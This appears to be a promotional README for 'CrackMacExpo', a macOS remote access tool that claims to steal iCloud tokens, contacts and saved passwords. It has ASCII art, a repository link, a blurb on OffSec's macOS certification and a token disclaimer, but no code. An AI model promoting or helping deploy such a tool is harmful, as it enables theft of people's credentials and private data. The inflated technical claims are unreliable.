  ____ ____      _    ____ _  ____  __    _    ____ _______  ______   ___  
 / ___|  _ \    / \  / ___| |/ /  \/  |  / \  / ___| ____\ \/ /  _ \ / _ \ 
| |   | |_) |  / _ \| |   | ' /| |\/| | / _ \| |   |  _|  \  /| |_) | | | |
| |___|  _ <  / ___ \ |___| . \| |  | |/ ___ \ |___| |___ /  \|  __/| |_| |
 \____|_| \_\/_/   \_\____|_|\_\_|  |_/_/   \_\____|_____/_/\_\_|    \___/ 
                                                               
Create with love by pxcs ( Sulaiman ) / Leader of GangstaCrew
Advanced macOS Control Bypasses - RAT Project

About CrackMacExpo
--------------------------------------------------
The most advanced GUI frontend && CLI RAT for macOS or OSX distro, Remote Access Tool. Penetrate the SSL and Security of OSX distro with a sharp IPA's 
malware, specialized for Apple. It can also retrieve iCloud tokens, contacts, and search engine passwords history. 

https://github.com/pxcs/CrackMacExpo

About OSMR | Offensive Security macOS Researcher
--------------------------------------------------
Offensive Securit Advanced macOS Control Bypasses (EXP-312) course provides a comprehensive understanding of macOS security and its inner workings. 
You’ll gain hands-on experience identifying and exploiting logic-based vulnerabilities within the operating system, learning to bypass security mechanisms 
and escalate privileges to ultimately gain root access on macOS systems.

Completion of the online training course and successfully passing the associated exam earns the OffSec macOS Researcher (OSMR) certification. 
This certification validates your expertise in macOS security and demonstrates your ability to analyze and exploit complex vulnerabilities, making 
you a highly sought-after professional in the field.


         __             _,-"~^"-.
       _// )      _,-"~`         `.
     ." ( /`"-,-"`                 ;  CrackMacExpo - Most Advanced macOS && OSX distro RAT
    / 6                             ;           Dont use for illegal activity
   /           ,             ,-"     ;
  (,__.--.      \           /        ;
   //'   /`-.\   |          |        `._____
     _.-'_/`  )  )--...,,,___\     \----////>>>>>>
   ((("~` _.-'.-'           __`-.   )     
         ((("`             (((---~"`        
